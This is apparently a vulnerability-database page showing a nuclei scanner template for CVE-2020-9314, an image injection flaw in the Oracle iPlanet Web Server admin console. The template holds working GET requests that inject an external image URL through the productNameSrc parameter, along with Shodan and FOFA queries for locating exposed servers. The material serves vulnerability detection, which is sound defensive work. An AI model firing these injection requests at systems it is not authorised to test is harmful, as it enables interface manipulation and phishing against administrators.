Lucene search
K

Oracle iPlanet Web Server 7.0.x - Image Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Oracle iPlanet Web Server 7.0.x allows image injection in the admin console via productNameSrc.

Related
Refs
Code
id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.01293
    epss-percentile: 0.66819
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a1424f9619013c5c10bb228534de21be643d8e0f4174095e44c8b4aa4c19dc31022100f2310daa3245a84d8dbbfc2d140e93179f0c98f7cd71649f0d5d943af6ce4a5b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.17.5
CVSS 25
EPSS0.81814
13